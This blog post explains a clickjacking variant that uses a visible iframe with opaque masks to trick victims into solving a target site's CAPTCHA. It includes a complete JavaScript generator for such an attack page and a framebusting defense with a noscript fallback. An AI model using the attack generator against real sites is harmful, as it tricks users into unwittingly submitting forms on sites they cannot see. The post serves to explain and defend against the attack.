20081121

CAPTCHA-Jacking

RSnake and Jeremiah Grossman did a really good and thorough job of going over clickjacking and many different ways that it can take place. And until I sat up one night and made my own example, I didn't consider how easy and how serious it was.

Before reading on, please note two things: 1) I'm not claiming to have discovered something new, and 2) I'm not recommending a new name or anything. RSnake and Jeremiah did all the work and listed a whole series of things that could happen, which they admitted was not exhaustive.

However, the most common way to pull off clickjacking is to load the target site in a fully transparent (opacity 0.0) iframe layered over "the red candy-like button", so the victim clicks the hidden target while believing they clicked the decoy. A teammate and I worked through a proof of concept that inverts this: the target site stays visible, and opaque divs stacked above the iframe hide every part of it except the piece you want the victim to interact with. The most natural example is a CAPTCHA: the victim sees what looks like the attacker's own "prove you are human" challenge, but is actually solving, and submitting, the CAPTCHA on the target site's form. That matters because plenty of sites explain that adding a CAPTCHA is a great way to eliminate XSRF and clickjacking at once; with a visible frame and masking divs, the CAPTCHA is no longer a defense, it is the thing the victim is tricked into solving.
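A page that does this, as an added example and not the post's own proof of concept: plain JavaScript that computes the masking rectangles for a given viewport onto the target and a given "hole" (the region holding the CAPTCHA image, its text field and the submit button), then emits the attack page. The target URL, the viewport size, the hole coordinates and the scroll offset are placeholders that an attacker would measure against the real target.

```javascript
// Added example (not the post's own proof of concept): build a "CAPTCHA-jacking"
// page. The target site is loaded in a fully VISIBLE iframe and opaque divs are
// stacked above it to hide everything except the CAPTCHA image, its text field
// and the submit button, so the victim solves the target's CAPTCHA believing it
// belongs to this page. Geometry is in CSS pixels; all numbers below are
// assumed placeholders that an attacker would measure against the real target.

// Rectangles are {x, y, w, h}. `frame` is the visible viewport onto the target,
// `hole` is the region of that viewport left uncovered. Returns up to four
// bands (above, below, left, right of the hole) that together cover the rest.
function maskRects(frame, hole) {
  const inside = hole.x >= 0 && hole.y >= 0 &&
    hole.x + hole.w <= frame.w && hole.y + hole.h <= frame.h;
  if (!inside) throw new RangeError('hole must lie inside the frame');
  const bands = [
    { x: 0, y: 0, w: frame.w, h: hole.y },                                     // above
    { x: 0, y: hole.y + hole.h, w: frame.w, h: frame.h - hole.y - hole.h },     // below
    { x: 0, y: hole.y, w: hole.x, h: hole.h },                                 // left
    { x: hole.x + hole.w, y: hole.y, w: frame.w - hole.x - hole.w, h: hole.h }, // right
  ];
  return bands.filter((r) => r.w > 0 && r.h > 0); // drop empty bands at the edges
}

// Axis-aligned overlap test, used to verify that no mask covers the hole.
function intersects(a, b) {
  return a.x < b.x + b.w && b.x < a.x + a.w && a.y < b.y + b.h && b.y < a.y + a.h;
}

function escAttr(s) {
  return String(s).replace(/&/g, '&amp;').replace(/"/g, '&quot;').replace(/</g, '&lt;');
}

// `offset` scrolls the target so that the CAPTCHA, which is rarely at the
// page's top-left, lands inside the viewport: the iframe is shifted up/left by
// that amount and enlarged to compensate, and the stage clips the overflow.
function captchaJackPage(targetUrl, frame, hole, offset = { x: 0, y: 0 }) {
  const masks = maskRects(frame, hole)
    .map((r) => `  <div class="mask" style="left:${r.x}px;top:${r.y}px;width:${r.w}px;height:${r.h}px"></div>`)
    .join('\n');
  return `<!DOCTYPE html>
<html><head><meta charset="utf-8"><title>Prove you are human</title>
<style>
  #stage { position: relative; overflow: hidden; width: ${frame.w}px; height: ${frame.h}px; }
  #stage iframe { position: absolute; border: 0;
    left: ${-offset.x}px; top: ${-offset.y}px;
    width: ${frame.w + offset.x}px; height: ${frame.h + offset.y}px; }
  .mask { position: absolute; z-index: 2; background: #fff; }
</style></head>
<body>
<p>Type the characters you see, then press the button to continue.</p>
<div id="stage">
  <iframe src="${escAttr(targetUrl)}" scrolling="no"></iframe>
${masks}
</div>
</body></html>`;
}

// Usage: node captchajack.js > attack.html
// Placeholder geometry: a 400x300 viewport onto https://target.example/signup,
// scrolled 600px down, with the CAPTCHA block occupying (100,80)-(300,200).
if (typeof require !== 'undefined' && require.main === module) {
  process.stdout.write(captchaJackPage('https://target.example/signup',
    { w: 400, h: 300 }, { x: 100, y: 80, w: 200, h: 120 }, { x: 0, y: 600 }));
}
```

The masks are ordinary opaque elements with a higher z-index than the iframe, so the target's own CAPTCHA image, input and button are the only things the victim can see, click or type into; everything the victim types goes straight into the target's form. Because nothing inside the frame is transparent, this works wherever an iframe works at all, and the only defense on the target side is refusing to be framed.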

RSnake and Jeremiah were right: the best way to avoid clickjacking is framebusting code, which also helps with a couple of other problems, such as DNS rebinding attacks. It is not bulletproof, because IE lets the attacker assign a security zone to an iframe and so switch scripting off inside it, but at least a noscript block can warn the user that they may be getting clickjacked. And if users were better about using different passwords for different sites, you could always re-prompt for the password before any sensitive action.
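The framebusting defense described above, as an added example that is not code from the post or from RSnake and Jeremiah. It belongs on the site that would be the clickjacking target. The check is written as a function taking the window object so it can be exercised outside a browser; `defensiveMarkup()` returns the fragments a page ships in `<head>` and at the top of `<body>`. The real content lives in a container (assumed id `app`) that CSS hides until the script has confirmed the page is top-level; if scripting is switched off inside the frame, the IE security-zone case the post mentions, the container stays hidden and only the noscript notice is visible, so there is nothing useful for a victim to click.

```javascript
// Added example (not the post's code): the framebusting defense the post
// recommends, for the site that is the clickjacking TARGET.
//   framebust(win)     - the runtime check, taking the window as a parameter
//                        so it can be tested with a fake window object.
//   defensiveMarkup()  - the <head> and <body> fragments a page embeds.
// The application's content sits in a container that is hidden by default and
// only revealed once script has confirmed the window is top-level. With script
// disabled in the frame, only the <noscript> notice shows.

const CONTENT_ID = 'app'; // assumed id of the page's real content container

// Returns true when the page was framed (and a break-out was attempted),
// false when it is top-level and the content has been revealed.
function framebust(win) {
  const root = win.document.documentElement;
  if (win.top === win.self) {
    // Top-level: tag <html> so the CSS rule below reveals the content.
    root.className = (root.className ? root.className + ' ' : '') + 'toplevel';
    return false;
  }
  try {
    // Framed: navigate the outermost window to our own URL, replacing the
    // attacker's page. Setting top.location is permitted across origins.
    win.top.location = win.self.location.href;
  } catch (e) {
    // A hostile or locked-down parent may reject the assignment; the
    // content stays hidden either way.
  }
  return true;
}

// Markup to embed. The style and script go first in <head> so the check runs
// before any content is parsed; the noscript notice goes at the top of <body>,
// outside the hidden container, so it is visible exactly when script is off.
function defensiveMarkup() {
  return {
    head: `<style>#${CONTENT_ID} { display: none; } html.toplevel #${CONTENT_ID} { display: block; }</style>
<script>(${framebust.toString()})(window);</script>`,
    bodyPrefix: `<noscript><p>This page needs scripting and must not be loaded inside another site's frame; ` +
      `if you did not expect this, you may be the target of clickjacking. Open it directly in a new window.</p></noscript>`,
  };
}
```

The hidden-by-default container is what makes the noscript case safe: a framebuster that only redirects can be neutralised by disabling script in the frame, whereas here the attacker then gets an empty box and a warning. Framebusting scripts have since been shown to have bypasses of their own (a framing page can, for instance, interfere with the top-level navigation), so treat this as defense in depth; the X-Frame-Options response header, which browsers added after this post, is the stronger control where it is available.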
